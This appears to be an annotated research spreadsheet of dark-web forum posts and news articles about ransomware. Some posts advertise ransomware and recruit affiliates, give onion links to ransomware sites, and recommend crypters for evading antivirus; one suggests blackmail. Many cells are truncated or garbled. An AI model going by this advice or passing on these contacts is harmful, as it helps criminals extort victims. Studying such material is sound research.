illicit digital economy taskforce;;the los angeles jcode task force;;bureau of narcotics and dangerous drugs (bndd);;the fbi washington field office���s hi-tech opioid task force;;u.s. immigration and customs enforcement���s homeland security investigations;;bureau of alcohol, tobacco, and firearms;;the department of justice���s multi-agency special operations division;;the department of justice���s criminal division��s ent of justice���s narcotic and dangerous drug section;;the national cyber joint investigative task force;;europol;;federal bureau of investigation (fbi);;drug enforcement administration (dea);;u.s. immigration and customs enforcement homeland security investigations (hsi);;u.s. customs and border protection (cbp);;united states postal inspection service (uspis);;department of justice (doj);;department of defense (dod);;department of defense office of inspector general;;;;���with the rapid innovation of digital assets and distributed ledger technologies, we have seen a rise in their illicit use by criminals who exploit them to fuel cyberattacks and ransomware and extortion schemes; traffic in narcotics, hacking tools and illicit contraband online; commit thefts and scams; and launder the proceeds of their crimes,��� ms. choi said.;;deputy attorney general lisa o. monaco announced today the creation of a national cryptocurrency enforcement team (ncet), to tackle complex investigations and pronal misuses of cryptocurrency, particularly crimes committed by virtual currency exchanges, mixing and tumbling services, and money laundering infrastructure actors.;;the u.s. department of justice (doj) earlier this week appointed eun young choi to serve as the first director of the national cryptocurrency enforcement team (ncet) it established last year.;;separately, the federal bureau of investigation (fbi) said it's launching a new effort of its own called the virtual asset exploitation unit (vaxu) dedicated to tracking and seizing illicit cryptocurrencies as part of a broader endeavor to disrupt international criminal networks.;;;https://www.justice.gov/opa/pr/deputy-attorney-general-lisa-o-monaco-announces-national-cryptocurrency-enforcement-team;;https://thehackernews.com/2022/02/justice-department-appoints-first.html;;https://www.wsj.com/articles/justice-department-names-crypto-enforcement-leader-11645132154;;https://www.marketswiki.com/wiki/national_cryptocurrency_enforcement_team_(ncet);;https://fortune.com/2022/02/17/eun-young-choi-leader-justice-department-national-cryptocurrency-enforcement-team/;;https://www.complianceweek.com/regulatory-enforcement/doj-names-head-of-crypto-enforcement-team/31376.article;;;*;the dmdcc task force is a joint effort between the u.s. attorney���s office, hsi ��� baltimore, the u.s. secret service, the u.s. postal inspection service; the food and drug administration, the internal revenue service ��� criminal investigation, the drug enforcement administration, the defense criminal investigative service, the baltimore police department, and the baltimore county police department, targeting the use of dark net marketplaces and digital currencies to facilitate cr</t>
  </si>
  <si>
    <t>An article talking about a new cryptocurrency task force and how ransomware affects it</t>
  </si>
  <si>
    <t>21/02/2022 15:37</t>
  </si>
  <si>
    <t>6749f5858ac886b2c80a</t>
  </si>
  <si>
    <t>Announcing a New Taskforce -- -- The National Cryptocurrency Enforcement Team</t>
  </si>
  <si>
    <t>70 days 21:53:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 2}</t>
  </si>
  <si>
    <t>i dread to imagine the tools north texas parcel task force; united states postal inspection service (uspis); jcode - joint criminal opioid darknet enforcement; u.s. postal inspection service office of investigations; the fbi washington field office���s hi-tech opioid task force; are using to detect contraband. the days of mailing anonymously are possibly e</t>
  </si>
  <si>
    <t>discussion regarding the liked article</t>
  </si>
  <si>
    <t>/u/CoquiMalagracido</t>
  </si>
  <si>
    <t>21/02/2022 16:00</t>
  </si>
  <si>
    <t>0 days 00:23:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the recent ransomware attack on the colonial pipeline has raised new concerns about cybersecurity.;;cyberattacks have grown during the coronavirus pandemic, and sites on the dark web are thriving with information and good obtained through those hacks, according to security experts.;;"they���ve got everything from bank logins, credit cards, corporate intelli" says neal bridges, a cybersecurity expert and chief content officer for cary-based ine. "there are quite a few known dark net marketplace websites that sell anything from drugs, guns, fake ids, passports, credit card numbers, personal identifiable information.";;most people surf the surface web, which accounts for only 4 percent of the internet. the deep web, which includes protected sites for medical and legal records, accounts for about 90 percent. the remainder is the dark web and its illicit activities.;;using a special browser to hide his identity and navigate the dark web, bridges searched "carolina" on one site and found plenty of hits, such as: a template for north carolina driver's licenses that sells for about $1; a social security number and a date of birth for a north carolina resident; some 7.4 million records in north carolina's voter database.;;"there���s a database leak from the northcarolina.gov we" he said, "the majority of the personal information on the dark net was stolen through hacking or email scams", he said. simon migliano, who researches sales trends on the dark web, said regardless of how the information is obtained, business has been booming during the pandemic.;;"we���ve probably seen some of the most interesting movement over the past couple of years in the last 12 m" he said. "what i would say is since the pandemic there���s been a lot more lis" migliano attributed the increase to lockdowns that had more people at home spending more time on the internet buying more services and goods to survive the isolation.;;"we���re seeing a lot more lifestyle brand accounts for sale on the dark web that we���ve never " he said. "the users on many of these accounts you're finding on the dark web now, like peloton, may not have had a lot of online accounts before but are being forced to use more online accounts because they���re stuck in their ";;among the pandemic-fueled items found by migliano, instacart account information going for more than $22, peloton accounts at almost $18, drizly, the alcohol delivery service, and amazon prime video at just above $13 per account. none was on the hot list in 2019, he noted.;;"they���re fresh blood, so to " he said, adding that the new accounts contain the most recent email addresses and passwords used by consumers. debit and credit cards, as well as bank information, still garner top dollar on the dark web. but it takes only one username and password for a cyber criminal to hit the jackpot. they can take that combination and run it through programs that submit it to hundreds, if not thousands, of other businesses.;;making it a volume business lets criminals keep their prices low enough that law enforcement is less likely to get involved. "the risk/reward factor for hackers is definitely in favor of the hackers," bridges said.;;both bridges and migliano urged people to use password managers and two-factor authentication to protect their account and personal information and to limit the potential damage if any of it does end up in the wrong hands. "you have to be more diligent than what you���re used to right now in protecting your personal information, your financial information and just everything about your digital" bridges said.</t>
  </si>
  <si>
    <t>article on the effect covid 19 has had on ransomware attacks/success rate</t>
  </si>
  <si>
    <t>18/05/2021 14:35</t>
  </si>
  <si>
    <t>ea62752816bcdb6214ec</t>
  </si>
  <si>
    <t>Another COVID-19 Side-effect: Booming Business on Dark Web</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;for years, radical transparency-focused activists like wikileaks have blurred the line between whistle-blowing and hacking. often, they've published any data they consider to be of public interest, no matter how questionable the source. but now one leak-focused group is mining a controversial new vein of secrets: the massive caches of data stolen by ransomware crews and dumped online when victims refuse to pay.;;today the transparency collective of data activists known as distributed denial of secrets published a massive new set of data on its website, all collected from dark web sites where the information was originally leaked online by ransomware hackers. ddosecrets has made available about 1 terabyte of that data, including more than 750,000 emails, photos, and documents from five companies. the group is also offering to privately share an additional 1.9 terabytes of data from more than a dozen other firms with selected journalists or academic researchers. in total, the giant data collection spans industries including pharmaceuticals, manufacturing, finance, software, retail, real estate, and oil and gas.;;all of that data, along with terabytes more that ddosecrets says it plans to offer in the coming weeks and months, is sourced from an increasingly common practice among cybercriminal ransomware operations. beyond just encrypting victim machines and demanding a payment for the decryption keys, ransomware hackers now often steal vast collections of victim data and threaten to post it online unless their hacking targets pay. in many cases, the victims refuse that extortion, and the cybercriminals follow through on their threat. the result is dozens or even hundreds of terabytes of internal corporate data, spilled out onto dark web servers whose web addresses are passed around among hackers and security researchers.;;ddosecrets' cofounder emma best argues that the trail of dumped data that ransomware operations leave in their wake often contains information that deserves to be scrutinized and, in some cases, revealed to the public. "ignoring valuable data that can inform the public about how industries operate isn't something we can afford to do," best wrote in a text exchange with wired. best, who uses the pronoun they, couldn't say in many cases exactly what secrets of potential public interest those massive data sets might contain, given that there's too much data for ddosecrets to comb through on its own. but they argue that any evidence of corporate malfeasance that those documents might reveal, or even intellectual property that can serve the public good, should be considered fair game.;;"whether it's a pharmaceutical company or petroleum company, or a company with technical data and specs that can speed progress for an entire industry or make everyone safer by sharing research," best says, "then we have a duty to make that available to researchers, journalists, and scholars so they can learn about how typically opaque industries (many of which control significant aspects of our lives and the future of the planet) operate.";;for those combatting the growing global epidemic of ransomware attacks, however, exploiting data leakage left behind by cybercriminal hackers carries new ethical questions. allan liska, an analyst and researcher for security firm recorded future, says he's seen firsthand the devastating effects of ransomware attacks on businesses large and small, and he argues that amplifying the leaks from ransomware groups only encourages them to threaten those leaks against more victims. "i personally think it's wrong," liska says. "even if you think your intentions are good, i think you're taking advantage of somebody who had a crime committed against them.";;best counters that ddosecrets isn���t publishing any data that wasn���t already made public by those hackers. ���all of the data are things ransomware hackers have already released,��� they say. ���we���re not receiving anything directly from them or working with them in any way. we���re taking data that journalists are unable or are afraid to access and making it available.��� best adds that in the majority of cases, ddosecrets won���t publish the data themselves but instead will share most of the leaks privately with journalists and researchers. in those cases, they���ll ask that those who publish the data redact anything that is overly sensitive���such as personally identifying information���and doesn���t have public interest value. but the group doesn���t rule out publishing that sensitive information themselves if they do see a public interest value in it, and it plans to offer the same discretion to publish to the jourrcriminals who might make use of personally identifiable information in ransomware leaks are already scouring those leaks, regardless of whether ddosecrets collects them or not. "the bogeymen everyone loves to be worried about?" best writes. "they've already got the data.";;best points to the case of perceptics, a license-plate-reader technology firm that was breached in the spring of last year and had its files spilled onto the dark web, likely by a ransomware hacker, according to tech news site the register. journalists at the intercept combed through the leaked data to show how perceptics had lobbied congress for customs and border protection contracts and downplayed security and privacy issues with its tech���even as the sensitive license-plate information it was collecting was left vulnerable to hackers.;;in june of this year, ddosecrets published its own bombshell collection of hacked documents, a massive collection of law enforcement files known as blueleaks, given to the group by a hacker associated with anonymous. the 269-gigabyte collection of documents from 200 state and local police organizations led twitter to ban the ddosecrets account and even block all tweets containing links to its website. reddit banned the r/blueleaks subreddit. shortly afterward, germsecutors in the town of zwickau ordered police to seize a server belonging to ddosecrets that hosted many of its files and the search engine for its data collection, a significant setback for the group from which it's still working to recover. it now plans to host its data on tor-protected .onion sites that hide the location of servers, making such seizures far more difficult in the future.;;despite those hurdles, ddosecrets remains undeterred in its larger mission. with its new ransomware trove, it's also tapped into a huge new source of leaks. just last year, more than 1,000 ransomware victims had their data spilled onto dark web sites, according to recorded future's liska. he estimates that one year of ransomware leaks alone adds up to between 100 and 200 terabytes of stolen data posted to various dark web sites.;;the ethics of digging through that cornucopia of leaked data for public interest information comes down to more than the question of whether it was leaked by an insider or stolen by a hacker, or even the intentions of whatever hacker might have stolen it, argues thomas rid, a professor of strategic studies at johns hopkins university who wrote extensively about hack-and-leak operations in his book active measures. if the data was truly made public by hackers previous to ddosecrets collecting it, that's very different from, for instance, wikileaks' widely criticized move to publish previously unpublished emails stolen from the democratic national committee by russia's military intelligence agency in 2016.;;but rid points out that in many cases, the data might be available on a dark web site for only a short time, making ddosecrets' decision to preserve it in perpetuity more ethically fraught. "by the time you're the only source, you're basically the publisher at that moment," rid says. "emma and their colleagues have to accept that there are these ethical edge cases. they can't just pretend that they're not in murky terrain.";;best, for their part, says that ignoring the existence of ransomware data only allows cybercriminals to exploit it while leaving its value as a source of newsworthy muckraking or other public benefit. "terabytes of data are flooding the dark web and being exploited almost entirely by cybercriminals and the sort of people security experts and pundits love to wring their hands about, but they're almost entirely unavailable to the public and to journalists," best writes. "our ultimate goal is���and always has been���to serve and inform"</t>
  </si>
  <si>
    <t xml:space="preserve">An article talking about wikileaks and whether the site is whistle  blowing or hacking after data from ransomware attacks was dumped there </t>
  </si>
  <si>
    <t>81d4ce106fbfc8ce8dc2</t>
  </si>
  <si>
    <t>Anti-Secrecy Activists Publish a Trove of Ransomware Victims' Data</t>
  </si>
  <si>
    <t>{'ransomware': 15}</t>
  </si>
  <si>
    <t>this is totally false and the reason people will attach malware to fraud/hack tools - people fall for this all the time.;;you have to judge on a file-by-file basis, and actually look at which viruses are being reported.;;step 1 - virustotal. they submit the file to all major av engines. if all/most avs say it's a hacktool or something like that then fine. if some/most/all report it's ransomware or a banking trojan then it's fucked.;;step 2 - unsure if fine or fucked? run it in a hardened sandbox environment, vm, or easiest option is online sandbox/hybrid analysis like any.run.;;anything sus - ask yourself if it's worth the risk!</t>
  </si>
  <si>
    <t>post mentioning ransomware during a debate</t>
  </si>
  <si>
    <t>/u/9nyx</t>
  </si>
  <si>
    <t>dff431e150ac4cf3db65</t>
  </si>
  <si>
    <t>Antidetect software</t>
  </si>
  <si>
    <t>3 days 03:01:00</t>
  </si>
  <si>
    <t>blackmatter, lockbit 2.0.</t>
  </si>
  <si>
    <t>post mentioning two types of ransomware when asked for good raas</t>
  </si>
  <si>
    <t>21/09/2021 14:51</t>
  </si>
  <si>
    <t>5e8c97e0405093d2ce32</t>
  </si>
  <si>
    <t>Any recommended RaaS?</t>
  </si>
  <si>
    <t>3 days 13:20:00</t>
  </si>
  <si>
    <t>{'lockbit': 1}</t>
  </si>
  <si>
    <t>http://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion/;http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion/</t>
  </si>
  <si>
    <t>link containing the word lockbit, the name of a notable ransomware</t>
  </si>
  <si>
    <t>21/09/2021 14:54</t>
  </si>
  <si>
    <t>0 days 00:02:00</t>
  </si>
  <si>
    <t>hi, i'm the author of redeemer, a ransomware available directly here, on dread;/d/redeemer;.;it's made from scratch in c++ and requires no dependencies or internet connection on the target device.;redeemer is free for everyone to download and use, while the fee is applied only for decryption.;;if you have any questions, send me a message.</t>
  </si>
  <si>
    <t xml:space="preserve">raas creator advertising his ransomware </t>
  </si>
  <si>
    <t>raas provider (group)</t>
  </si>
  <si>
    <t>21/09/2021 17:35</t>
  </si>
  <si>
    <t>hey. i connected the dots last week and i'm pretty damn sure the new blackcat ransomware is from the guys behind blackmatter. just another typical shutdown, restructure, and rebrand to shake off le attention.;;i'm interested as fuck bc i liked blackmatter. i want to check out their site and go through any sample data leaks if they have them. but i cant fukin find a link to their site.;;i guess i'm a dumbass for that. but anyone have the link?</t>
  </si>
  <si>
    <t>user discussing the possibillity that blackcat and blackmatter being made by the same team</t>
  </si>
  <si>
    <t>/u/BurnedAtTheStake</t>
  </si>
  <si>
    <t>28/12/2021 10:29</t>
  </si>
  <si>
    <t>ea5f595d74bf24115d26</t>
  </si>
  <si>
    <t>Anyone have the link to ALPHV BlackCat Ransomware leak site?</t>
  </si>
  <si>
    <t>94 days 00:06:00</t>
  </si>
  <si>
    <t>{'blackcat': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>this site has a really good breakdown of the ransomware.;bleepingcomputer[dot]com/news/security/alphv-blackcat-this-years-most-sophisticated-ransomware/;each victim possibly has their own site to go to. so there does't seem to be a centralized site like in the past.;if you look in virustotal at some of the samples, you can also see that each sample gives a "access key" to access the site where the vic will negotiate the ransom.;i guess you could dl the malware run it and get the unique url to see what it all looks like.;samples are easy to find in vt.</t>
  </si>
  <si>
    <t>user providing a link to a bleeping computer link with them stating that most ransomware groups tend to have their own site vs being on one centralised site</t>
  </si>
  <si>
    <t>/u/amira0harb</t>
  </si>
  <si>
    <t>11 days 15:08:00</t>
  </si>
  <si>
    <t>that makes some sense. but are these guys not doing double extortion then?;;do they have somewhere they leak company data, for the companies that didn't pay up?</t>
  </si>
  <si>
    <t>user asking if the above groups perform double extortion and if so where they display/sell stolen data</t>
  </si>
  <si>
    <t>2 days 16:42:00</t>
  </si>
  <si>
    <t>i was reading this article on ddw;;https://www.deepdotweb.com/2015/05/27/new-deepweb-site-offers-free-ransomware-creation/;;and i wonder if this service, "tox", still exists somewhere, or at least the source code. i'd like to learn it.;;thanks...</t>
  </si>
  <si>
    <t>asking if tox still exists</t>
  </si>
  <si>
    <t>/u/dope</t>
  </si>
  <si>
    <t>16/07/2018 02:39</t>
  </si>
  <si>
    <t>6dda336c2671fa275438</t>
  </si>
  <si>
    <t>Anyone knows if Tox ransomware cration service is still live?</t>
  </si>
  <si>
    <t>1 days 22:27:00</t>
  </si>
  <si>
    <t>everything in the title , im not looking for these 20$ shit ransomware , i need a powerful one , undetectable please , vendors please hit me up</t>
  </si>
  <si>
    <t>user asking for ransomware</t>
  </si>
  <si>
    <t>/u/charybde2025</t>
  </si>
  <si>
    <t>29/03/2021 05:14</t>
  </si>
  <si>
    <t>/d/WhiteHouseMarket</t>
  </si>
  <si>
    <t>edbde7af84ab06f030d3</t>
  </si>
  <si>
    <t>Anyone selling ransomware ? Undetectable !</t>
  </si>
  <si>
    <t>10 days 06:28:00</t>
  </si>
  <si>
    <t>check my store on whm;;whm &gt;&gt; search &gt;&gt; drhack3r &gt;&gt; view store;;i have ransomware 100% undetectable</t>
  </si>
  <si>
    <t>user offering ransomware</t>
  </si>
  <si>
    <t>/u/drhack3r2</t>
  </si>
  <si>
    <t>29/03/2021 09:42</t>
  </si>
  <si>
    <t>0 days 04:28:00</t>
  </si>
  <si>
    <t>the richest cybercriminals are probably the ransomware guys. fraudsters probably close behind. just my opinion, ymmv.</t>
  </si>
  <si>
    <t>User stating they believe that ransomware affiliates are rich</t>
  </si>
  <si>
    <t>/u/Hungry_Eyes</t>
  </si>
  <si>
    <t>26/08/2022 22:36</t>
  </si>
  <si>
    <t>56fc7df7d30d70275ac9</t>
  </si>
  <si>
    <t>Are Market Admins The Richest Cybercriminals?</t>
  </si>
  <si>
    <t>1 days 22:17:00</t>
  </si>
  <si>
    <t>im trying to become a ransonware affiliate so bad, trying to join a group to learn the ropes and know what kind of equipment/software i need</t>
  </si>
  <si>
    <t>User wishing to become a ransomware affiliate</t>
  </si>
  <si>
    <t>26/08/2022 23:21</t>
  </si>
  <si>
    <t>0 days 00:25:00</t>
  </si>
  <si>
    <t>i think that teams that play with ransomware and targeted niches are well placed in the game too</t>
  </si>
  <si>
    <t>/u/DarkCoder</t>
  </si>
  <si>
    <t>27/08/2022 01:15</t>
  </si>
  <si>
    <t>0 days 01:54:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;as more cities see their police departments targeted with ransomware attacks, some analysts are voicing concerns that the attacks, which could lead to inaccessible systems and potentially compromised evidence, could impede criminal prosecutions.;;;source:;data breach today;;among the latest developments, the police department in the city of azusa, arizona, reported friday it had been hit by ransomware in march, resulting in the compromise of personally identifiable information, including social security numbers, passport information and data collected by license plate readers.;;meanwhile, data apparently stolen from the clearfield borough police department in pennsylvania was posted on the marketo darknet marketplace, security researchers tell information security media group.;;the clearfield police department has not released any information on the attack nor responded to a request for additional information.;;the azusa and clearfield borough police departments join a long list of law enforcement agencies that have been hit with ransomware, including the washington, d.c., metropolitan police. in april, that department acknowledged it had been victimized by a cyber incident. the babuk ransomware gang took responsibility for the attack and has played a game of cat and mouse with the metro police department over the last few months by posting data purportedly taken from its network in an attempt to spur a ransom payment.;;"police departments and prosecutors hold considerable sensitive information relating to victims, witnesses, investigations and employees," says john bandler, an adjunct professor at pace university���s elisabeth haub school of law. defense attorneys will always look for any edge they can gain, including corrupted evidence, to free their clients, he adds.;;;impact on court cases;;any information related to a criminal investigation that is stolen and publicly posted not only endangers those involved but can result in failed prosecutions, says brett callow, a threat analyst with the security firm emsis"these incidents could certainly impact prosecutions - in fact, they already have as multiple cases have had to be dropped due to lost evidence," callow says. "additionally, the release of information online and questions over the integrity of compromised data could both create challenges to successful prosecutions.";;callow pointed out one case in stuart, florida, which resulted in six suspected drug dealers being allowed to walk free after a ransomware attack locked investigators out of the computers that held evidence needed for the case.;;darren r. hayes, professor at pace university���s seidenberg school of computer science and information systems, says it may be possible to determine if the evidence in a particular case was exposed in a bre"case-related information may have been compromised, but a good network forensics examiner does have ways to identify which host computers on a network have been accessed," hayes says. "there are operating system files that we can view that can show when a computer was accessed, how it was accessed and from where it was accessed.";;;the azusa attack;;azusa police officials say the ransomware attack was discovered on march 9 when staffers were unable to access parts of the department's computer system.;;"the investigation determined that azusa police was the victim of a sophisticated ransomware attack and that certain systems and information were accessed by an unauthorized individual," according to a police statement. "azusa police refused to cooperate with the cybercriminal and did not pay any ransom.";;azusa officials say information exposed included social security numbers, driver's license numbers, california identification card numbers, passport numbers, military identification numbers, financial account information, medical information, health insurance information and/or information or data collected through the use or operation of an automated license plate recognition system.;;;clearfield borough attack;;the clearfield borough police department, which serves a city of 6,500, has not released any information on the attack that struck it.;;a screenshot from the marketo darknet market, supplied to ismg by security researchers, shows the attackers claiming to have taken 11gb of data containing mug shots, police reports, financial information, incident data and photographs of accidents and crime scenes.;;the theft of such data raises concerns about "the safety of civilians and officers whose personal information is exposed and the additional risk which nonavailability of systems can cause," bandler says. "for example, in past cases, offices have been unable to obtain details relating to vehicles and their drivers prior to making traffic stops."</t>
  </si>
  <si>
    <t xml:space="preserve">News article regarding whether the increase in ransomware attacks on police departments has impeded investigations </t>
  </si>
  <si>
    <t>6b930ee71ecf7ec7f374</t>
  </si>
  <si>
    <t>Are Ransomware Attacks Impeding Criminal Prosecutions?</t>
  </si>
  <si>
    <t>{'ransomware': 6}</t>
  </si>
  <si>
    <t>got some ransomware i want to spread. have never used or coded a crypter before so making my own would take forever. are any online crypters fud? i guess i should just run a few vms with different avs and test but honestly i can't find any crypters. do i need to buy of dnms or are they on like github? thx</t>
  </si>
  <si>
    <t>Potential hacker wishing to spread ransomware and asking for advice on how to spread it</t>
  </si>
  <si>
    <t>potential hacker (individual) /education (request)</t>
  </si>
  <si>
    <t>/u/Fraudnoob123</t>
  </si>
  <si>
    <t>20/11/2021 16:57</t>
  </si>
  <si>
    <t>5c6a3c811c53e8e947d6</t>
  </si>
  <si>
    <t>Are any available online crypter FUD? Or do I need to code my own?</t>
  </si>
  <si>
    <t>24/11/2021 16:33</t>
  </si>
  <si>
    <t>8ea76e5460c4348759d3</t>
  </si>
  <si>
    <t>1 days 04:42:00</t>
  </si>
  <si>
    <t>i use encoder for 45$ on one month,on begin its really fud but after time stub will be burned and more and more av its detect;so best way is make own</t>
  </si>
  <si>
    <t>User responding with advice</t>
  </si>
  <si>
    <t>/u/ThePandora</t>
  </si>
  <si>
    <t>24/11/2021 16:56</t>
  </si>
  <si>
    <t>vmprotect and cassandra crpyer are excellent options.</t>
  </si>
  <si>
    <t>24/11/2021 17:58</t>
  </si>
  <si>
    <t>0 days 01:02:00</t>
  </si>
  <si>
    <t>100% agree, also for cassandra get a private stub if you need your files to be fud for more than 24hrs (otherwise you will have to crypt the exes again every day)</t>
  </si>
  <si>
    <t>/u/bread_addict</t>
  </si>
  <si>
    <t>24/11/2021 19:47</t>
  </si>
  <si>
    <t>0 days 01:49:00</t>
  </si>
  <si>
    <t>ransom ware is hard to do now a days.;;-most new computers back everything up in a cloud its literally called ransomware protection;;-most normal people dont have enough money or care enough about the files on their computer to pay thousands of dollars.;;-you would need to find a way to plant the ransomware without being detected since most ransomware is caught by anti-virus;;a better option would be extortion or black mail. where you silently download files of someone who is doing something sneaky like an affair or illegal. and then you threaten to expose them or the files they hold. most of these people may not have a lot of money but they have much more of a want to not have them files leaked</t>
  </si>
  <si>
    <t>User debating the efficacy of ransomware compared to extortion/blackmail due to how effective computers are at detecting ransomware</t>
  </si>
  <si>
    <t>/u/CertifiedVegan</t>
  </si>
  <si>
    <t>18/05/2020 04:44</t>
  </si>
  <si>
    <t>cfa0814862c94f7af6d9</t>
  </si>
  <si>
    <t>Are the Ransomware underrated than Fraud/Carding?</t>
  </si>
  <si>
    <t>0 days 14:03:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 3}</t>
  </si>
  <si>
    <t>does anyone have have a link or links to any public documents disclosing how the jbs ransomware hackers infiltrated jbs' systems? thanks</t>
  </si>
  <si>
    <t>User asking for links to public documents reagrding how the JBS ransomware attack occured</t>
  </si>
  <si>
    <t>information / education (request)</t>
  </si>
  <si>
    <t>/u/CrankyRobot45</t>
  </si>
  <si>
    <t>8d9945dda0d8e37e6b0e</t>
  </si>
  <si>
    <t>Attack Methodology For JBS USA ransomware attack</t>
  </si>
  <si>
    <t>15 days 16:23:00</t>
  </si>
  <si>
    <t>can find you some details i was reading, need to find where i have it saved;but i remember it was 12 days they were wandering inside, since obtaining initial access to corp network;;which was fast compared to garmin which was more then 1 month;or cna ( when evilcorp took 40m ), which was since sw, like 6 months or something</t>
  </si>
  <si>
    <t>User responding providing basic information on the details of the attack and promise to provide documents</t>
  </si>
  <si>
    <t>20/05/2022 13:08</t>
  </si>
  <si>
    <t>spiros psarris  december 10, 2021  ������ nice reading������;;cybercrime has become an extremely lucrative industry. the large hacker groups are making millions of dollars per year. (according to the us treasury, ransomware payments alone totaled $590 million in the first half of 2021.);;this has created two growing trends: first, a rising complexity of threats, because the hackers are hiring top programming talent. (some advertise openly on job boards in russia and other cis countries.) second, more human participation in cyberattacks, because they are also building teams of skilled operators for their attack tools.;;most attacks are still automated. however, we are observing a growing number of incidents where humans are directly involved, systematically probing the target���s defenses and trying different tactics to see what will work. the hackers are creative, and they pay close attention to results. when one tactic is blocked, they respond immediately with something differento;���������������������������������������;moderate rate of requests: at an average of 50,000 requests per day, the rate was moderate enough to try to stay ���under the radar��� and avoid triggering a ddos incident response, while still allowing the attackers to attempt a worthwhile number of atos.;credential cracking: the incident began as a straightforward ato attack based on a password dictionary (a list of the most commonly used passwords) to try to crack user credentials and steal accounts.;credential stuffing: after the attackers realized that cracking would not be successful, they changed to credential stuffing instead (i.e., iterating through a list of full credential sets presumably stolen from other sites. because many web users still reuse the same credentials across multiple sites, a certain percentage of the login attempts will usually be successful). this type of attack is harder to detect, because each useion: early in the incident, the attackers began using a different ip for every request.;isp rotation: when their ip rotation failed, the attackers also started using a global pool of asns.;further variation: as the attack proceeded, we saw a lot of diversity in the tactics being used. the attackers tried a variety of user agents, language and locale parameters, and other characteristics, attempting to make their requests appear to be unique and unrelated (to avoid being rate-limited by our security platform).;;aftermath;���������������;the tactics used in this incident would have been successful against many���perhaps even most���targets. robust rate limiting is vital to defeating brute-force assaults, but many web security solutions only offer basic ato protection capabilities, such as counting the requests from each ip. those solutions would have failed to prevent this ato attack.;;additionally, we noticed that the attackers had an impressive granularity in their tovariety of parameters in the requests being generated, and they were methodical and thoughtful in the tactics that they tried.;;the reblaze platform provides advanced account takeover (ato) protection capabilities which can detect and block brute-force attacks according to request content, individual parameters, combinations of parameters, the number of combinations of parameters, and more, all with customizable responses. we were able to track and block their efforts.;;this incident had multiple phases, as the attackers tried different tactics and our security team deployed immediate countermeasures. eventually, they gave up.;;note: a pdf version of this report is available here: human-directed ato (account takeover) attack. this is part of our new attack of the month series, which began last month with the black friday ddos attack report. all reports will be available in pdf form here.;;��� i download it and up again ���;;http://uoxqi4lrfqztugili7zzgygibs4xstehf5hohtkpyqcoyryweypzkwid.onion/?img4.jpg;;http://uoxqi4lrfqztugili7zzgygibs4xstehf5hohtkpyqcoyryweypzkwid.onion/?img=461641290625.jpg</t>
  </si>
  <si>
    <t xml:space="preserve">Usr discussing the  increased complexity in cybercrime, stating that the increase in talents and human interaction make attacks more compex and successful </t>
  </si>
  <si>
    <t>/u/AANVOER</t>
  </si>
  <si>
    <t>30a8c6f62b88a191cfb8</t>
  </si>
  <si>
    <t>Attack of the Month: Human-Directed Account Takeover (ATO)</t>
  </si>
  <si>
    <t>2 days 01:32:00</t>
  </si>
  <si>
    <t>anyone, who is willing to fight in guerilla or lonewolf operations when the time comes, anyone who can carry out cyber-attacks, especially database breaches and ransomware, anyone with sensitive classified information that can be used in the movement against the 'elite', anyone in positions of power who could help our cause, dm me and i will tell you the rest about the organization!;;i highly recommend, that first you check out the posts in;/d/conspiracy;first, to see if our ideologies allign.;;i thank every one of you in advance,;;morpheus</t>
  </si>
  <si>
    <t xml:space="preserve">User asking for those with talents for ransomware to join their conspiracy group to help their cause </t>
  </si>
  <si>
    <t>/u/Morpheus</t>
  </si>
  <si>
    <t>27/02/2022 00:10</t>
  </si>
  <si>
    <t>/d/conspiracy</t>
  </si>
  <si>
    <t>efa1059ae5a018215528</t>
  </si>
  <si>
    <t>Attention Dread!</t>
  </si>
  <si>
    <t>hello world.;;this is vulcan ransomware group. we are looking for experienced individuals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testinginst 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 our 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payment;;how to join?;you need to pass an interview, answer the necessary questions.;- your work experience.;- you work alone or with a team?;- what affiliate programs have you worked with?;;how to contact?;- pm's. send a messages and you will be answered. in case of post deletion/closure you can reach us at :-;jabber:- vulcanransomteam@jabber.calyxinstitute.org;;thank you for staying till the end of this post.</t>
  </si>
  <si>
    <t>ransomware group asking for more members</t>
  </si>
  <si>
    <t xml:space="preserve">hacker (group) </t>
  </si>
  <si>
    <t>/u/VulcanRansomTeam</t>
  </si>
  <si>
    <t>01163bd61866d93f295c</t>
  </si>
  <si>
    <t>Attention please! | Affiliates Needed!!  | VulcanRansomTeam</t>
  </si>
  <si>
    <t>0 days 00:36:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;not surprisingly, armando ordonez, ceo of round rock-based cyberdefenses, is pretty tight-lipped about what the company is seeing as it works to squash election interference. cyberdefenses announced last month that it���s partnering with austin cybersecurity startup spycloud to protect the integrity of upcoming and future elections.;;���we���re not coming across things that you wouldn���t see with an attack against a consumer company,��� ordonez said in a recent interview. ���but i can���t say much about (the details of) what we���ve found.��� cyberdefenses is working on behalf of one in five of the 3,000 counties running elections across the country.;;it provides election security assessments that take a look at the entire cycle of an election, benchmark cyber risk and provide recommendations to plug holes that could put election offices at risk for cyberattacks and interference.;;spycloud continuously monitors the dark pe, including election staff, county officials and third-party suppliers who could be targeted because of their access to elections, the news release said.;;���spycloud is instrumental to the work we do in ensuring that every vote c" ordonez said. "it gives county governments an 'over-the-horizon view' of the cybercriminal landscape, with advanced information to protect elections from fraud and foreign interference, before it's too late.";;cyberdefenses was founded in 2001 by a group who had served in the u.s. army. ���for a long period of time, it was generally federally focused,��� ordonez said. ���there was a natural progression into government work.���;;the company ���has been able to get in front of a number of counties across the country in multiple states. there���s definitely a lot of traction there, and we���ve been able to provide a lot of good information to the counties,��� said ordonez, who joined cyberdefenses in 2015 and took over the ceo role in 2018. ���election departments are grappling with the same cybersecurity issues that every company or federal agency faces. in the work that we���ve done so far, we are seeing similarities regardless of the industry.���;;those similarities include disinformation campaigns and ransomware attacks, he said. stolen credentials are still the top form of attack, the news release said. any account associated with election operaton assets compromised in data breaches. cyberdefenses alerts the county when it cannot be determined whether the user logging in is legitimate.;;"spycloud's ability to continuously monitor suppliers as well makes their partnership essential to our mission," ordonez said in the release. "anyone doing business with the county needs to be secure themselves, so they 